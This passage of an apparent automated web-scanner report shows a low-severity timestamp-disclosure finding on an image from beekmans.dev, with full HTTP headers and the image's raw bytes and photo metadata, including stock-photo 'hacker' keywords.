20px;position:relative;z-index:999999999;box-shadow:0 2px 8px rgba(0,0,0,.2)}#cf-wrapper #cf-error-banner h4,#cf-wrapper #cf-error-banner p{display:-moz-inline-stack;display:inline-block;vertical-align:bottom;zoom:1}#cf-wrapper #cf-error-banner h4{color:#2f7bbf;font-weight:400;font-size:20px;line-height:1;vertical-align:baseline}#cf-wrapper #cf-error-banner .cf-error-actions{margin-bottom:10px;text-align:center;width:100%}#cf-wrapper #cf-error-banner .cf-error-actions a{display:-moz-inline-stack;display:inline-block;vertical-align:middle;zoom:1}#cf-wrapper #cf-error-banner .cf-error-actions a+a{margin-left:10px}#cf-wrapper #cf-error-banner .cf-error-actions .cf-btn-accept,#cf-wrapper #cf-error-banner .cf-error-actions .cf-btn-success{color:#fff}#cf-wrapper #cf-error-banner .error-header-desc{text-align:left}#cf-wrapper #cf-error-banner .cf-close{color:#999;cursor:pointer;display:inline-block;font-size:34.5px;float:none;font-weight:700;height:22.5px;line-height:.6;overflow:hidden;position:absolute;right:20px;top:25px;text-indent:200%;width:22.5px}#cf-wrapper #cf-error-banner .cf-close:hover{color:gray}#cf-wrapper #cf-error-banner .cf-close:before{content:"\00D7";left:0;height:100%;position:absolute;text-align:center;text-indent:0;top:0;width:100%}#cf-inline-error-wrapper{box-shadow:0 2px 10px rgba(0,0,0,.5)}#cf-wrapper #cf-error-details{background:#fff}#cf-wrapper #cf-error-details .cf-error-overview{padding:25px 0 0}#cf-wrapper #cf-error-details .cf-error-overview h1,#cf-wrapper #cf-error-details .cf-error-overview h2{font-weight:300}#cf-wrapper #cf-error-details .cf-error-overview h2{margin-top:0}#cf-wrapper #cf-error-details .cf-highlight{background:#ebebeb;overflow-x:hidden;padding:30px 0;background-image:-webkit-gradient(linear,left top, left bottom,from(#dedede),color-stop(3%, #ebebeb),color-stop(97%, #ebebeb),to(#dedede));background-image:linear-gradient(top,#dedede,#ebebeb 3%,#ebebeb 97%,#dedede)}#cf-wrapper #cf-error-details .cf-highlight h3{color:#999;font-weight:300}#cf-wrapper #cf-error-details .cf-highlight .cf-column:last-child{padding-bottom:0}#cf-wrapper #cf-error-details .cf-highlight .cf-highlight-inverse{background-color:#fff;padding:15px;border-radius:2px}#cf-wrapper #cf-error-details .cf-status-display h3{margin-top:.5em}#cf-wrapper #cf-error-details .cf-status-label{color:#9bca3e;font-size:1.46667em}#cf-wrapper #cf-error-details .cf-status-label,#cf-wrapper #cf-error-details .cf-status-name{display:inline}#cf-wrapper #cf-error-details .cf-status-item{display:block;position:relative;text-align:left}#cf-wrapper #cf-error-details .cf-status-item,#cf-wrapper #cf-error-details .cf-status-item.cf-column{padding-bottom:1.5em}#cf-wrapper #cf-error-details .cf-status-item.cf-error-source{display:block;text-align:center}#cf-wrapper #cf-error-details .cf-status-item.cf-error-source:after{bottom:-60px;content:"";display:none;border-bottom:18px solid #fff;border-left:20px solid transparent;border-right:20px solid transparent;height:0;left:50%;margin-left:-9px;position:absolute;right:50%;width:0}#cf-wrapper #cf-error-details .cf-status-item+.cf-status-item{border-top:1px solid #dedede;padding-top:1.5em}#cf-wrapper #cf-error-details .cf-status-item+.cf-status-item:before{background:url(/cdn-cgi/images/cf-icon-horizontal-arrow.png) no-repeat;content:"";display:block;left:0;position:absolute;top:25.67px}#cf-wrapper #cf-error-details .cf-error-source .cf-icon-error-container{height:85px;margin-bottom:2.5em}#cf-wrapper #cf-error-details .cf-error-source .cf-status-label{color:#bd2426}#cf-wrapper #cf-error-details .cf-error-source .cf-icon{display:block}#cf-wrapper #cf-error-details .cf-error-source .cf-icon-status{bottom:-10px;left:50%;top:auto;right:auto}#cf-wrapper #cf-error-details .cf-error-source .cf-status-label,#cf-wrapper #cf-error-details .cf-error-source .cf-status-name{display:block}#cf-wrapper #cf-error-details .cf-icon-error-container{height:auto;position:relative}#cf-wrapper #cf-error-details .cf-icon-status{display:block;margin-left:-24px;position:absolute;top:0;right:0}#cf-wrapper #cf-error-details .cf-icon{display:none;margin:0 auto}#cf-wrapper #cf-error-details .cf-status-desc{display:block;height:22.5px;overflow:hidden;text-overflow:ellipsis;width:100%;white-space:nowrap}#cf-wrapper #cf-error-details .cf-status-desc:empty{display:none}#cf-wrapper #cf-error-details .cf-error-footer{padding:1.33333em 0;border-top:1px solid #ebebeb;text-align:center}#cf-wrapper #cf-error-details .cf-error-footer p{font-size:13px}#cf-wrapper #cf-error-details .cf-error-footer select{margin:0!important}#cf-wrapper #cf-error-details .cf-footer-item{display:block;margin-bottom:5px;text-align:left}#cf-wrapper #cf-error-details .cf-footer-separator{display:none}#cf-wrapper #cf-error-details .cf-captcha-info{margin-bottom:10px;position:relative;text-align:center}#cf-wrapper #cf-error-details .cf-captcha-image{height:57px;width:300px}#cf-wrapper #cf-error-details .cf-captcha-actions{margin-top:15px}#cf-wrapper #cf-error-details .cf-captcha-actions a{font-size:0;height:36.38px;overflow:hidden;padding-left:1.2em;padding-right:1.2em;position:relative;text-indent:-9999px;width:36.38px;white-space:nowrap}#cf-wrapper #cf-error-details .cf-captcha-actions a.cf-icon-refresh span{background-position:0 -787px}#cf-wrapper #cf-error-details .cf-captcha-actions a.cf-icon-announce span{background-position:0 -767px}#cf-wrapper #cf-error-details .cf-captcha-actions a.cf-icon-question span{background-position:0 -827px}#cf-wrapper #cf-error-details .cf-screenshot-container{background:url(/cdn-cgi/images/browser-bar.png?1376755637) no-repeat #fff;max-height:400px;max-width:100%;overflow:hidden;padding-top:53px;width:960px;border-radius:5px 5px 0 0}#cf-wrapper #cf-error-details .cf-screenshot-container .cf-no-screenshot{background:url(/cdn-cgi/images/cf-no-screenshot-warn.png) no-repeat;display:block;height:158px;left:25%;margin-top:-79px;overflow:hidden;position:relative;top:50%;width:178px}#cf-wrapper #cf-error-details .cf-captcha-container .cf-screenshot-container,#cf-wrapper #cf-error-details .cf-captcha-container .cf-screenshot-container img,#recaptcha-widget .cf-alert,#recaptcha-widget .recaptcha_only_if_audio,.cf-cookie-error{display:none}#cf-wrapper #cf-error-details .cf-screenshot-container .cf-no-screenshot.error{background:url(/cdn-cgi/images/cf-no-screenshot-error.png) no-repeat;height:175px}#cf-wrapper #cf-error-details .cf-screenshot-container.cf-screenshot-full .cf-no-screenshot{left:50%;margin-left:-89px}.cf-captcha-info iframe{max-width:100%}#cf-wrapper .cf-icon-ok{background:url(/cdn-cgi/images/cf-icon-ok.png) no-repeat;height:48px;width:48px}#cf-wrapper .cf-icon-error{background:url(/cdn-cgi/images/cf-icon-error.png) no-repeat;height:48px;width:48px}#cf-wrapper .cf-icon-browser{background:url(/cdn-cgi/images/cf-icon-browser.png) no-repeat;height:80px;width:100px}#cf-wrapper .cf-icon-cloud{background:url(/cdn-cgi/images/cf-icon-cloud.png) no-repeat;height:77px;width:151px}#cf-wrapper .cf-icon-server{background:url(/cdn-cgi/images/cf-icon-server.png) no-repeat;height:75px;width:95px}#cf-wrapper .cf-icon-railgun{background-position:0 -848px;height:81px;width:95px}#cf-wrapper .cf-caret{border:.33333em solid transparent;border-top-color:inherit;content:"";height:0;width:0;display:-moz-inline-stack;display:inline-block;vertical-align:middle;zoom:1}@media screen and (min-width:49.2em){#cf-wrapper #cf-error-details .cf-status-desc:empty,#cf-wrapper #cf-error-details .cf-status-item.cf-error-source:after,#cf-wrapper #cf-error-details .cf-status-item .cf-icon,#cf-wrapper #cf-error-details .cf-status-label,#cf-wrapper #cf-error-details .cf-status-name{display:block}#cf-wrapper .cf-wrapper{width:708px}#cf-wrapper #cf-error-banner{padding:20px 20px 25px}#cf-wrapper #cf-error-banner .cf-error-actions{margin-bottom:15px}#cf-wrapper #cf-error-banner .cf-error-header-desc h4{margin-right:.5em}#cf-wrapper #cf-error-details h1{font-size:4em}#cf-wrapper #cf-error-details .cf-error-overview{padding-top:2.33333em}#cf-wrapper #cf-error-details .cf-highlight{padding:4em 0}#cf-wrapper #cf-error-details .cf-status-item{text-align:center}#cf-wrapper #cf-error-details .cf-status-item,#cf-wrapper #cf-error-details .cf-status-item.cf-column{padding-bottom:0}#cf-wrapper #cf-error-details .cf-status-item+.cf-status-item{border:0;padding-top:0}#cf-wrapper #cf-error-details .cf-status-item+.cf-status-item:before{background-position:0 -544px;height:24.75px;margin-left:-37.5px;width:75px;background-size:131.25px auto}#cf-wrapper #cf-error-details .cf-icon-error-container{height:85px;margin-bottom:2.5em}#cf-wrapper #cf-error-details .cf-icon-status{bottom:-10px;left:50%;top:auto;right:auto}#cf-wrapper #cf-error-details .cf-error-footer{padding:2.66667em 0}#cf-wrapper #cf-error-details .cf-footer-item,#cf-wrapper #cf-error-details .cf-footer-separator{display:-moz-inline-stack;display:inline-block;vertical-align:baseline;zoom:1}#cf-wrapper #cf-error-details .cf-footer-separator{padding:0 .25em}#cf-wrapper #cf-error-details .cf-status-item.cloudflare-status:before{margin-left:-50px}#cf-wrapper #cf-error-details .cf-status-item.cloudflare-status+.status-item:before{margin-left:-25px}#cf-wrapper #cf-error-details .cf-screenshot-container{height:400px;margin-bottom:-4em;max-width:none}#cf-wrapper #cf-error-details .cf-captcha-container .cf-screenshot-container,#cf-wrapper #cf-error-details .cf-captcha-container .cf-screenshot-container img{display:block}}@media screen and (min-width:66em){#cf-wrapper .cf-wrapper{width:960px}#cf-wrapper #cf-error-banner .cf-close{position:relative;right:auto;top:auto}#cf-wrapper #cf-error-banner .cf-details{white-space:nowrap}#cf-wrapper #cf-error-banner .cf-details-link{padding-right:.5em}#cf-wrapper #cf-error-banner .cf-error-actions{float:right;margin-bottom:0;text-align:left;width:auto}#cf-wrapper #cf-error-details .cf-status-item+.cf-status-item:before{background-position:0 -734px;height:33px;margin-left:-50px;width:100px;background-size:auto}#cf-wrapper #cf-error-details .cf-status-item.cf-cloudflare-status:before{margin-left:-66.67px}#cf-wrapper #cf-error-details .cf-status-item.cf-cloudflare-status+.cf-status-item:before{margin-left:-37.5px}#cf-wrapper #cf-error-details .cf-captcha-image{float:left}#cf-wrapper #cf-error-details .cf-captcha-actions{position:absolute;top:0;right:0}}.no-js #cf-wrapper .js-only{display:none}#cf-wrapper #cf-error-details .heading-ray-id{font-family:monaco,courier,monospace;font-size:15px;white-space:nowrap}
          
          Evidence
          999999999
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        29. GET https://beekmans.dev/img/portfolio/minor/blue/36-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          134348800, which evaluates to: 1974-04-05 00:06:40

          Request
          Request line and header section (265 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/36-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1158 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:08 GMT
          Content-Type: image/jpeg
          Content-Length: 64833
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "fd41-5cfcb9beafa60"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 1099
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5huJF4cliNws1kNbVWT700RS%2B9LaiJ%2BMV5CuLOj75IUvrFH9Hr56jt0hnpGur5D3UUbJTgQDAjB937Lrl8lcOCFvqMCBhlaE44ehvtb3AQ3Dmsn2xi0BBywZD9W8yHQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47eb8004c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (64833 bytes)
          ÿØÿàJFIF``ÿá
          ÓExifII*íIÚŽàntƒ‹(1“2ži‡¦›œ‚²žœV4ŸœŠhacker in a jacket with a hood with a laptop sits at the table. Added identity theft icons, account hijacking, bank data theft and world map.CanonCanon EOS 700DÀÆ-'ÀÆ-'PhotoScape2018:06:03 23:07:25hacker in a jacket with a hood with a laptop sits at the table. data; danger; internet; code; concept; privacy; virus; network; security; computer; web; identity; attack; dark; crime; man; table; theft; cyber; hacker; online; anonymous; information; software; type; secure; laptop; professional; hack; password; hacking; safety; enter; criminal; prevention; notebook; phishing; using; worm; work; programmer; trojan; hood; illegal; system; antivirus program; person; fraud; background; deskhacker in a jacket with a hood with a laptop sits at the table. Added identity theft icons, account hijacking, bank data theft and world map.š‚ ‚("ˆ'ˆd0ˆ2ˆd02300D’
          X’`’
          h’p’	’
          ’x†’ð€ ÿÿ í I¢p
          ¢x
          ¢¤¤¤¤1¤
          €
          2¤
          4¤­
          5¤À
          È2013:12:29 00:53:532013:12:29 00:53:53Тt@Bϒi@B$ASCIISSUCv3H4sIAAAAAAAEAIVSy27DIBC8V+o/WJxtyQTsOPmHSr1HPWCztVGIsXikiiL/e8GPhERRKy7M7O4wu8v1/S1JUM2MaNA+uQbksZDSGauZFar3dJ4uPHBhlRZMBjJw4xRBxjLrDJhIohatsao5Dp2yyvNk1TCdsxb0FAx8JNMwC63XfxRavB1mnKyBKegrfAihNOKMqydupcb0j8pPUIOEV/Uf0N8l5svX2gNroW8uweQY2dcggc1TOMyp6PjjWz1N7SxJZ8FBRZg5LlTU7lk1TJqnwQxaNKJvozJlO9ARbvy+1CkiemUnJ8tsEPezDRATvN1U4RQU07IoK7Tu0C9E8NjrvNZO+JC+RB7dIBXjwO/Ui4XjYlORguwqchvu8+7nFJqTfM4Yb3/E1SfhMx9feF1Nt3n6jwlalGR5IRqqCOqoJDndMMqzbyghoxXfZazgZYZzUu8A57zGhf8H4y+wSCPvKQMAAA==O~¼4U373075006498(EF17-40mm f/4L USM0000000000ÿá:Îhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
          <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 4.1.1-Exiv2">
           <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
            <rdf:Description rdf:about=""
              xmlns:crs="http://ns.adobe.com/camera-raw-settings/1.0/"
              xmlns:xap="http://ns.adobe.com/xap/1.0/"
              xmlns:aux="http://ns.adobe.com/exif/1.0/aux/"
              xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
              xmlns:xapMM="http://ns.adobe.com/xap/1.0/mm/"
              xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
              xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#"
              xmlns:dc="http://purl.org/dc/elements/1.1/"
              xmlns:MicrosoftPhoto_1_="http://ns.microsoft.com/photo/1.0/"
             crs:RawFileName="IMG_5199.CR2"
             crs:Version="9.8"
             crs:ProcessVersion="6.7"
             crs:WhiteBalance="As Shot"
             crs:AutoWhiteVersion="134348800"
             crs:Temperature="6200"
             crs:Tint="+13"
             crs:Saturation="0"
             crs:Sharpness="25"
             crs:LuminanceSmoothing="0"
             crs:ColorNoiseReduction="25"
             crs:VignetteAmount="0"
             crs:ShadowTint="0"
             crs:RedHue="0"
             crs:RedSaturation="0"
             crs:GreenHue="0"
             crs:GreenSaturation="0"
             crs:BlueHue="0"
             crs:BlueSaturation="0"
             crs:Vibrance="0"
             crs:HueAdjustmentRed="0"
             crs:HueAdjustmentOrange="0"
             crs:HueAdjustmentYellow="0"
             crs:HueAdjustmentGreen="0"
             crs:HueAdjustmentAqua="0"
             crs:HueAdjustmentBlue="0"
             crs:HueAdjustmentPurple="0"
             crs:HueAdjustmentMagenta="0"
             crs:SaturationAdjustmentRed="0"
             crs:SaturationAdjustmentOrange="0"
             crs:SaturationAdjustmentYellow="0"
             crs:SaturationAdjustmentGreen="0"
             crs:SaturationAdjustmentAqua="0"
             crs:SaturationAdjustmentBlue="0"
             crs:SaturationAdjustmentPurple="0"
             crs:SaturationAdjustmentMagenta="0"
             crs:LuminanceAdjustmentRed="0"
             crs:LuminanceAdjustmentOrange="0"
             crs:LuminanceAdjustmentYellow="0"
             crs:LuminanceAdjustmentGreen="0"
             crs:LuminanceAdjustmentAqua="0"
             crs:LuminanceAdjustmentBlue="0"
             crs:LuminanceAdjustmentPurple="0"
             crs:LuminanceAdjustmentMagenta="0"
             crs:SplitToningShadowHue="0"
             crs:SplitToningShadowSaturation="0"
             crs:SplitToningHighlightHue="0"
             crs:SplitToningHighlightSaturation="0"
             crs:SplitToningBalance="0"
             crs:ParametricShadows="0"
             crs:ParametricDarks="0"
             crs:ParametricLights="0"
             crs:ParametricHighlights="0"
             crs:ParametricShadowSplit="25"
             crs:ParametricMidtoneSplit="50"
             crs:ParametricHighlightSplit="75"
             crs:SharpenRadius="+1.0"
             crs:SharpenDetail="25"
             crs:SharpenEdgeMasking="0"
             crs:PostCropVignetteAmount="0"
             crs:GrainAmount="0"
             crs:ColorNoiseReductionDetail="50"
             crs:ColorNoiseReductionSmoothness="50"
             crs:LensProfileEnable="0"
             crs:LensManualDistortionAmount="0"
             crs:PerspectiveVertical="0"
             crs:PerspectiveHorizontal="0"
             crs:PerspectiveRotate="0.0"
             crs:PerspectiveScale="100"
             crs:PerspectiveAspect="0"
             crs:PerspectiveUpright="0"
             crs:PerspectiveX="0.00"
             crs:PerspectiveY="0.00"
             crs:AutoLateralCA="0"
             crs:Exposure2012="+0.65"
             crs:Contrast2012="+14"
             crs:Highlights2012="+12"
             crs:Shadows2012="-15"
             crs:Whites2012="0"
             crs:Blacks2012="0"
             crs:Clarity2012="0"
             crs:DefringePurpleAmount="0"
             crs:DefringePurpleHueLo="30"
             crs:DefringePurpleHueHi="70"
             crs:DefringeGreenAmount="0"
             crs:DefringeGreenHueLo="40"
             crs:DefringeGreenHueHi="60"
             crs:Dehaze="0"
             crs:ToneMapStrength="0"
             crs:ConvertToGrayscale="False"
             crs:ToneCurveName="Medium Contrast"
             crs:ToneCurveName2012="Linear"
             crs:CameraProfile="Adobe Standard"
             crs:CameraProfileDigest="BA45C872F6A5D11497D00CBA08D5783F"
             crs:LensProfileSetup="LensDefaults"
             crs:UprightVersion="151388160"
             crs:UprightCenterMode="0"
             crs:UprightCenterNormX="0.5"
             crs:UprightCenterNormY="0.5"
             crs:UprightFocalMode="0"
             crs:UprightFocalLength35mm="35"
             crs:UprightPreview="False"
             crs:UprightTransformCount="6"
             crs:UprightFourSegmentsCount="0"
             crs:HasSettings="True"
             crs:HasCrop="False"
             crs:AlreadyApplied="True"
             xap:Rating="0"
             xap:ModifyDate="2018-06-03T23:07:25+03:00"
             xap:CreateDate="2013-12-29T00:53:53"
             xap:MetadataDate="2018-06-03T23:15:58+03:00"
             xap:CreatorTool="Adobe Photoshop CC 2017 (Windows)"
             aux:SerialNumber="373075006498"
             aux:LensInfo="17/1 40/1 0/0 0/0"
             aux:Lens="EF17-40mm f/4L USM"
             aux:LensID="231"
             aux:LensSerialNumber="0000000000"
             aux:ImageNumber="0"
             aux:ApproximateFocusDistance="372/100"
             aux:FlashCompensation="0/1"
             aux:Firmware="1.1.4"
             photoshop:DateCreated="2013-12-29T00:53:53"
             photoshop:LegacyIPTCDigest="FE4259D653B76A6D98332B527F221691"
             photoshop:ColorMode="3"
             photoshop:ICCProfile="Adobe RGB (1998)"
             xapMM:DocumentID="adobe:docid:photoshop:c3703942-52c7-11e8-bd54-e910d37672ae"
             xapMM:OriginalDocumentID="B5831E1C2251FE2C015A9161D841CB07"
             xapMM:InstanceID="xmp.iid:850b66c5-928c-764d-9853-2b1637019deb"
             dc:format="image/jpeg">
             <crs:ToneCurve>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>32, 22</rdf:li>
               <rdf:li>64, 56</rdf:li>
               <rdf:li>128, 128</rdf:li>
               <rdf:li>192, 196</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurve>
             <crs:ToneCurveRed>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurveRed>
             <crs:ToneCurveGreen>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurveGreen>
             <crs:ToneCurveBlue>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurveBlue>
             <crs:ToneCurvePV2012>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurvePV2012>
             <crs:ToneCurvePV2012Red>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurvePV2012Red>
             <crs:ToneCurvePV2012Green>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurvePV2012Green>
             <crs:ToneCurvePV2012Blue>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurvePV2012Blue>
             <photoshop:DocumentAncestors>
              <rdf:Bag>
               <rdf:li>xmp.did:575e95f8-8b0b-5f4b-8f74-e357ec31cb33</rdf:li>
              </rdf:Bag>
             </photoshop:DocumentAncestors>
             <photoshop:Headline>
              <rdf:Alt>
               <rdf:li>hacker in a jacket with a hood with a laptop sits at the table. </rdf:li>
              </rdf:Alt>
             </photoshop:Headline>
             <xapMM:History>
              <rdf:Seq>
               <rdf:li
                stEvt:action="derived"
                stEvt:parameters="converted from image/x-canon-cr2 to image/tiff"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:23b5655a-6741-a247-913b-5219ad3a5ef3"
                stEvt:when="2018-05-07T23:41:32+03:00"
                stEvt:softwareAgent="Adobe Photoshop Camera Raw 9.8 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:a0ae3901-555f-994a-9dcd-059a864d1904"
                stEvt:when="2018-05-07T23:42:01+03:00"
                stEvt:softwareAgent="Adobe Photoshop CC 2017 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="converted"
                stEvt:parameters="from image/tiff to application/vnd.adobe.photoshop"/>
               <rdf:li
                stEvt:action="derived"
                stEvt:parameters="converted from image/tiff to application/vnd.adobe.photoshop"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:575e95f8-8b0b-5f4b-8f74-e357ec31cb33"
                stEvt:when="2018-05-07T23:42:01+03:00"
                stEvt:softwareAgent="Adobe Photoshop CC 2017 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:d3996ad5-113c-a74b-9245-1f3a02eefa12"
                stEvt:when="2018-05-08T16:57:53+03:00"
                stEvt:softwareAgent="Adobe Photoshop CC 2017 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="converted"
                stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/>
               <rdf:li
                stEvt:action="derived"
                stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:0dcc8af0-dbc1-014c-b748-bda8a6854bd0"
                stEvt:when="2018-05-08T16:57:53+03:00"
                stEvt:softwareAgent="Adobe Photoshop CC 2017 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:9e76d847-c3b6-7148-b311-431630914674"
                stEvt:when="2018-06-03T23:05:45+03:00"
                stEvt:softwareAgent="Adobe Bridge CC (Windows)"
                stEvt:changed="/metadata"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:e78942ac-bb59-1c4e-8f8f-66032e78d7ae"
                stEvt:when="2018-06-03T23:07:25+03:00"
                stEvt:softwareAgent="Adobe Photoshop CC 2017 (Windows)"
                stEvt:changed="/"/>
               <rdf:li
                stEvt:action="saved"
                stEvt:instanceID="xmp.iid:850b66c5-928c-764d-9853-2b1637019deb"
                stEvt:when="2018-06-03T23:15:58+03:00"
                stEvt:softwareAgent="Adobe Bridge CC (Windows)"
                stEvt:changed="/metadata"/>
              </rdf:Seq>
             </xapMM:History>
             <xapMM:DerivedFrom
              stRef:instanceID="xmp.iid:d3996ad5-113c-a74b-9245-1f3a02eefa12"
              stRef:documentID="adobe:docid:photoshop:185649bf-5237-11e8-9e13-a05ef46db9cb"
              stRef:originalDocumentID="B5831E1C2251FE2C015A9161D841CB07"/>
             <dc:description>
              <rdf:Alt>
               <rdf:li xml:lang="x-repair">hacker in a jacket with a hood with a laptop sits at the table. Added identity theft icons, account hijacking, bank data theft and world map.</rdf:li>
              </rdf:Alt>
             </dc:description>
             <dc:title>
              <rdf:Alt>
               <rdf:li xml:lang="x-repair">hacker in a jacket with a hood with a laptop sits at the table. </rdf:li>
              </rdf:Alt>
             </dc:title>
             <dc:subject>
              <rdf:Bag>
               <rdf:li>data</rdf:li>
               <rdf:li>danger</rdf:li>
               <rdf:li>internet</rdf:li>
               <rdf:li>code</rdf:li>
               <rdf:li>concept</rdf:li>
               <rdf:li>privacy</rdf:li>
               <rdf:li>virus</rdf:li>
               <rdf:li>network</rdf:li>
               <rdf:li>security</rdf:li>
               <rdf:li>computer</rdf:li>
               <rdf:li>web</rdf:li>
               <rdf:li>identity</rdf:li>
               <rdf:li>attack</rdf:li>
               <rdf:li>dark</rdf:li>
               <rdf:li>crime</rdf:li>
               <rdf:li>man</rdf:li>
               <rdf:li>table</rdf:li>
               <rdf:li>theft</rdf:li>
               <rdf:li>cyber</rdf:li>
               <rdf:li>hacker</rdf:li>
               <rdf:li>online</rdf:li>
               <rdf:li>anonymous</rdf:li>
               <rdf:li>information</rdf:li>
               <rdf:li>software</rdf:li>
               <rdf:li>type</rdf:li>
               <rdf:li>secure</rdf:li>
               <rdf:li>laptop</rdf:li>
               <rdf:li>professional</rdf:li>
               <rdf:li>hack</rdf:li>
               <rdf:li>password</rdf:li>
               <rdf:li>hacking</rdf:li>
               <rdf:li>safety</rdf:li>
               <rdf:li>enter</rdf:li>
               <rdf:li>criminal</rdf:li>
               <rdf:li>prevention</rdf:li>
               <rdf:li>notebook</rdf:li>
               <rdf:li>phishing</rdf:li>
               <rdf:li>using</rdf:li>
               <rdf:li>worm</rdf:li>
               <rdf:li>work</rdf:li>
               <rdf:li>programmer</rdf:li>
               <rdf:li>trojan</rdf:li>
               <rdf:li>hood</rdf:li>
               <rdf:li>illegal</rdf:li>
               <rdf:li>system</rdf:li>
               <rdf:li>antivirus program</rdf:li>
               <rdf:li>person</rdf:li>
               <rdf:li>fraud</rdf:li>
               <rdf:li>background</rdf:li>
               <rdf:li>desk</rdf:li>
              </rdf:Bag>
             </dc:subject>
             <MicrosoftPhoto_1_:LastKeywordXMP>
              <rdf:Bag>
               <rdf:li>data</rdf:li>
               <rdf:li>danger</rdf:li>
               <rdf:li>internet</rdf:li>
               <rdf:li>code</rdf:li>
               <rdf:li>concept</rdf:li>
               <rdf:li>privacy</rdf:li>
               <rdf:li>virus</rdf:li>
               <rdf:li>network</rdf:li>
               <rdf:li>security</rdf:li>
               <rdf:li>computer</rdf:li>
               <rdf:li>web</rdf:li>
               <rdf:li>identity</rdf:li>
               <rdf:li>attack</rdf:li>
               <rdf:li>dark</rdf:li>
               <rdf:li>crime</rdf:li>
               <rdf:li>man</rdf:li>
               <rdf:li>table</rdf:li>
               <rdf:li>theft</rdf:li>
               <rdf:li>cyber</rdf:li>
               <rdf:li>hacker</rdf:li>
               <rdf:li>online</rdf:li>
               <rdf:li>anonymous</rdf:li>
               <rdf:li>information</rdf:li>
               <rdf:li>software</rdf:li>
               <rdf:li>type</rdf:li>
               <rdf:li>secure</rdf:li>
               <rdf:li>laptop</rdf:li>
               <rdf:li>professional</rdf:li>
               <rdf:li>hack</rdf:li>
               <rdf:li>password</rdf:li>
               <rdf:li>hacking</rdf:li>
               <rdf:li>safety</rdf:li>
               <rdf:li>enter</rdf:li>
               <rdf:li>criminal</rdf:li>
               <rdf:li>prevention</rdf:li>
               <rdf:li>notebook</rdf:li>
               <rdf:li>phishing</rdf:li>
               <rdf:li>using</rdf:li>
               <rdf:li>worm</rdf:li>
               <rdf:li>work</rdf:li>
               <rdf:li>programmer</rdf:li>
               <rdf:li>trojan</rdf:li>
               <rdf:li>hood</rdf:li>
               <rdf:li>illegal</rdf:li>
               <rdf:li>system</rdf:li>
               <rdf:li>antivirus program</rdf:li>
               <rdf:li>person</rdf:li>
               <rdf:li>fraud</rdf:li>
               <rdf:li>background</rdf:li>
               <rdf:li>desk</rdf:li>
              </rdf:Bag>
             </MicrosoftPhoto_1_:LastKeywordXMP>
            </rdf:Description>
           </rdf:RDF>
          </x:xmpmeta>
                                                                                                              
                                                                                                              
                                                                                                              
                                                                                                              
